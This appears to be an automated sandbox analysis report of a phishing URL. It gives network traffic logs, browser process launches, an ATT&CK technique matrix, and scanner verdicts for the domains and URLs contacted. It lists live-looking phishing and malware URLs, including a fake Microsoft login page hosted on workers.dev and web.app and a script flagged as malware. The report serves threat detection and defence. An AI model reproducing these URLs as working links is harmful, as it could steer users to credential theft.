Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: unknown	HTTPS traffic detected: 23.220.189.216:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.220.189.216:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49698 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\chrome_BITS_6184_58946819

Jump to behavior

Source: classification engine

Classification label: mal100.phis.win@23/114@42/22

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=1972,i,12317150299343217891,15753523565498466481,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://analytics.twitter.com/mob_idsync_click?slug=MnH3QFlxCF&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&ad_tracking=true&tailored_ads=true
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=1972,i,12317150299343217891,15753523565498466481,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Drive-by Compromise	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://analytics.twitter.com/mob_idsync_click?slug=MnH3QFlxCF&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&ad_tracking=true&tailored_ads=true	0%	Avira URL Cloud	safe
https://analytics.twitter.com/mob_idsync_click?slug=MnH3QFlxCF&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&ad_tracking=true&tailored_ads=true	0%	Virustotal		Browse
https://analytics.twitter.com/mob_idsync_click?slug=MnH3QFlxCF&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&ad_tracking=true&tailored_ads=true	100%	SlashNext	Credential Stealing type: Phishing & Social usering

Source	Detection	Scanner	Link
part-0008.t-0009.t-msedge.net	0%	Virustotal	Browse
rullbullpullpushcndapp.web.app	0%	Virustotal	Browse
cs1100.wpc.omegacdn.net	0%	Virustotal	Browse
smsmail.net	12%	Virustotal	Browse
part-0010.t-0009.t-msedge.net	0%	Virustotal	Browse
aadcdn.msftauth.net	0%	Virustotal	Browse
part-0013.t-0009.t-msedge.net	0%	Virustotal	Browse
khanmotiozpisx.ellieb7.workers.dev	8%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse
niakallzodamiozxza.pixiepowder00.workers.dev	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://smsmail.net/re/65ba6b45a7471c8dd3b9f0fd	100%	Avira URL Cloud	phishing
https://rkugxtvgxusbsfrtcv.kute.pw/65ba6b50a7471c8dd3b9f0fe-65ba6b45a7471c8dd3b9f0fd.js	100%	Avira URL Cloud	malware
https://khanmotiozpisx.ellieb7.workers.dev/	100%	Avira URL Cloud	phishing
https://rullbullpullpushcndapp.web.app/sdxhetfdzzdsdsdxz/themes/imgs/ellipsis_white.svg	0%	Avira URL Cloud	safe
https://rullbullpullpushcndapp.web.app/sdxhetfdzzdsdsdxz/themes/imgs/microsoft_logo.svg	0%	Avira URL Cloud	safe
https://rullbullpullpushcndapp.web.app/sdxhetfdzzdsdsdxz/themes/css/d35c51ca863429284bf173d706c95f1cnbr1706715983.css	0%	Avira URL Cloud	safe
https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/o/aHR0cHM6Ly9sb2dpbi5s	0%	Avira URL Cloud	safe
https://khanmotiozpisx.ellieb7.workers.dev/	3%	Virustotal		Browse
https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/o/jsdisabled	0%	Avira URL Cloud	safe
https://rullbullpullpushcndapp.web.app/sdxhetfdzzdsdsdxz/themes/imgs/ellipsis_grey.svg	0%	Avira URL Cloud	safe
https://rullbullpullpushcndapp.web.app/sdxhetfdzzdsdsdxz/themes/149def4ccd8dab4c569bcf0843fd0619.js	0%	Avira URL Cloud	safe
https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx	100%	Avira URL Cloud	phishing
https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/o/aHR0cHM6Ly9vdXRsb29r	0%	Avira URL Cloud	safe
https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/o/aHR0cHM6Ly9sb2dpbi5saXZlLmNvbQ==-lg/Me.htm?v=3	0%	Avira URL Cloud	safe
https://niakallzodamiozxza.pixiepowder00.workers.dev/favicon.ico	0%	Avira URL Cloud	safe
https://rullbullpullpushcndapp.web.app/sdxhetfdzzdsdsdxz/themes/0e80cb422a1f2a979e32fc3f0a9ed189nbr1706715983.js	0%	Avira URL Cloud	safe
https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP	0%	Avira URL Cloud	safe
https://rullbullpullpushcndapp.web.app/sdxhetfdzzdsdsdxz/themes/css/0e80cb422a1f2a979e32fc3f0a9ed189nbr1706715983.css	0%	Avira URL Cloud	safe
https://rullbullpullpushcndapp.web.app/sdxhetfdzzdsdsdxz/themes/js/238d344c676a54d66afd34590ccc34d21706715975.js	0%	Avira URL Cloud	safe
https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx	9%	Virustotal		Browse

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a.nel.cloudflare.com	35.190.80.1	true	false		high
rullbullpullpushcndapp.web.app	199.36.158.100	true	false	0%, Virustotal, Browse	unknown
cs1100.wpc.omegacdn.net	152.199.4.44	true	false	0%, Virustotal, Browse	unknown
accounts.google.com	142.250.9.84	true	false		high
s.twitter.com	104.244.42.67	true	false		high
part-0008.t-0009.t-msedge.net	13.107.213.36	true	false	0%, Virustotal, Browse	unknown
rkugxtvgxusbsfrtcv.kute.pw	172.67.167.114	true	false		unknown
khanmotiozpisx.ellieb7.workers.dev	172.67.135.172	true	false	8%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	0%, Virustotal, Browse	unknown
smsmail.net	172.67.176.237	true	false	12%, Virustotal, Browse	unknown
part-0010.t-0009.t-msedge.net	13.107.213.38	true	false	0%, Virustotal, Browse	unknown
LYH-efz.ms-acdc.office.com	52.96.165.194	true	false		high
part-0013.t-0009.t-msedge.net	13.107.213.41	true	false	0%, Virustotal, Browse	unknown
t.co	104.244.42.197	true	false		high
cdnjs.cloudflare.com	104.17.25.14	true	false		high
niakallzodamiozxza.pixiepowder00.workers.dev	104.21.57.22	true	false	0%, Virustotal, Browse	unknown
cm.g.doubleclick.net	108.177.122.156	true	false		high
www.google.com	172.217.215.106	true	false		high
clients.l.google.com	172.253.124.101	true	false		high
unpkg.com	104.16.126.175	true	false		high
r4.res.office365.com	unknown	unknown	false		high
aadcdn.msftauth.net	unknown	unknown	false	0%, Virustotal, Browse	unknown
outlook.office365.com	unknown	unknown	false		high
analytics.twitter.com	unknown	unknown	false		high
clients2.google.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://analytics.twitter.com/tpm?idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg	false		high
https://cdnjs.cloudflare.com/ajax/libs/vee-validate/2.0.0-rc.3/vee-validate.min.js	false		high
https://rkugxtvgxusbsfrtcv.kute.pw/65ba6b50a7471c8dd3b9f0fe-65ba6b45a7471c8dd3b9f0fd.js	false	Avira URL Cloud: malware	unknown
https://cdnjs.cloudflare.com/ajax/libs/vuex/2.3.1/vuex.min.js	false		high
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.134&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1	false		high
https://outlook.office365.com/owa/prefetch.aspx	false		high
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard	false		high
https://smsmail.net/re/65ba6b45a7471c8dd3b9f0fd	false	Avira URL Cloud: phishing	unknown
https://rullbullpullpushcndapp.web.app/sdxhetfdzzdsdsdxz/themes/imgs/ellipsis_white.svg	false	Avira URL Cloud: safe	unknown
https://khanmotiozpisx.ellieb7.workers.dev/	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://analytics.twitter.com/mob_idsync_click?slug=MnH3QFlxCF&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&ad_tracking=true&tailored_ads=true	false		high
https://rullbullpullpushcndapp.web.app/sdxhetfdzzdsdsdxz/themes/imgs/microsoft_logo.svg	false	Avira URL Cloud: safe	unknown
https://analytics.twitter.com/favicon.ico	false		high
https://rullbullpullpushcndapp.web.app/sdxhetfdzzdsdsdxz/themes/css/d35c51ca863429284bf173d706c95f1cnbr1706715983.css	false	Avira URL Cloud: safe	unknown
https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP?sso_reload=true	true		unknown
https://t.co/MnH3QFlxCF	false		high
https://rullbullpullpushcndapp.web.app/sdxhetfdzzdsdsdxz/themes/imgs/ellipsis_grey.svg	false	Avira URL Cloud: safe	unknown
https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx#/ld-SILENTCODERSEMAIL	true		unknown
https://a.nel.cloudflare.com/report/v3?s=iUNDbtjXuSOrsXHhPk%2BRv8tO90iT3Y7iej0v39FcA75Iq%2FmEDuO8YQhyYNlKAsfQZxyIMQZRgYPK0V%2BWqiCeRQBr86m46v2Rr1Mr2bS3Ts%2FKzRUglUDB6iNMsIbxoX%2FbTsYsvXEO8Fulgj6IiA%3D%3D	false		high
https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx	false	9%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://unpkg.com/vue-router@2.7.0/dist/vue-router.min.js	false		high
https://cm.g.doubleclick.net/pixel?google_nid=twitter_dbm&google_redir=https://analytics.twitter.com/tpm&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&google_hm=N2RiMDQ0NGQwOTFhMmFmZjQ4ODY1MGQxMWZhZjViYTU0Y2ExM2I1YmY2NDFkNWE2ODJlNmI0Yzk1YmY1YmVkNg==	false		high
https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/PQ1Sgkxel	true		unknown
https://rullbullpullpushcndapp.web.app/sdxhetfdzzdsdsdxz/themes/149def4ccd8dab4c569bcf0843fd0619.js	false	Avira URL Cloud: safe	unknown
https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/o/aHR0cHM6Ly9sb2dpbi5saXZlLmNvbQ==-lg/Me.htm?v=3	false	Avira URL Cloud: safe	unknown
https://niakallzodamiozxza.pixiepowder00.workers.dev/favicon.ico	false	Avira URL Cloud: safe	unknown
https://cm.g.doubleclick.net/pixel?google_nid=twitter_dbm&google_redir=https://analytics.twitter.com/tpm&idb=AAAAEIAFT-YAhwNDR8CckUSMgv9nxMXnueoZNJY4nZYIy84e9IkHjNXsKQOQ1Eue5Oxz0wDXVP4t6aEOYgQtZktlP5pd9Q7dFtqJRdsOjyeuV00saNwP4BEARNR04Zp9vGKn35A7agXNht0fLvc8xVOutembfJrgmJnV4j9DYxoh1To2n0Q8cXJzqw4-_V8KXLSG-z5fG42qU4hnys8KSo_vcoClKM84NKl7Oz0S_hRAgM_SwJuLg5M3Vg-ZQ2V5FuJqdmVLXoiOP5gBT_ssHralRg&google_hm=N2RiMDQ0NGQwOTFhMmFmZjQ4ODY1MGQxMWZhZjViYTU0Y2ExM2I1YmY2NDFkNWE2ODJlNmI0Yzk1YmY1YmVkNg==&google_tc=	false		high
https://a.nel.cloudflare.com/report/v3?s=mRS7%2BzPl4OpDL2f2YFctVuUzq%2B3mZXzH28579TDm67wzgdUaR5orIGN5dcTqDWscvHU8OZeXl%2BOydb%2BJ8ZcWRd2rdwGBVtRffPzQwmDkW3j32yflajnY%2BYEFXULSlnTXAz95CAdmXo401VAegLmAapUdOf2a	false		high
https://unpkg.com/axios@0.16.1/dist/axios.min.js	false		high
https://cdnjs.cloudflare.com/ajax/libs/vue-i18n/7.0.3/vue-i18n.min.js	false		high
https://rullbullpullpushcndapp.web.app/sdxhetfdzzdsdsdxz/themes/0e80cb422a1f2a979e32fc3f0a9ed189nbr1706715983.js	false	Avira URL Cloud: safe	unknown
https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP	false	Avira URL Cloud: safe	unknown
https://unpkg.com/vue@2.6.11/dist/vue.min.js	false		high
https://rullbullpullpushcndapp.web.app/sdxhetfdzzdsdsdxz/themes/css/0e80cb422a1f2a979e32fc3f0a9ed189nbr1706715983.css	false	Avira URL Cloud: safe	unknown
https://rullbullpullpushcndapp.web.app/sdxhetfdzzdsdsdxz/themes/js/238d344c676a54d66afd34590ccc34d21706715975.js	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/mobile-detect/1.3.6/mobile-detect.min.js	false		high
https://unpkg.com/lodash@4.17.4/lodash.min.js	false		high
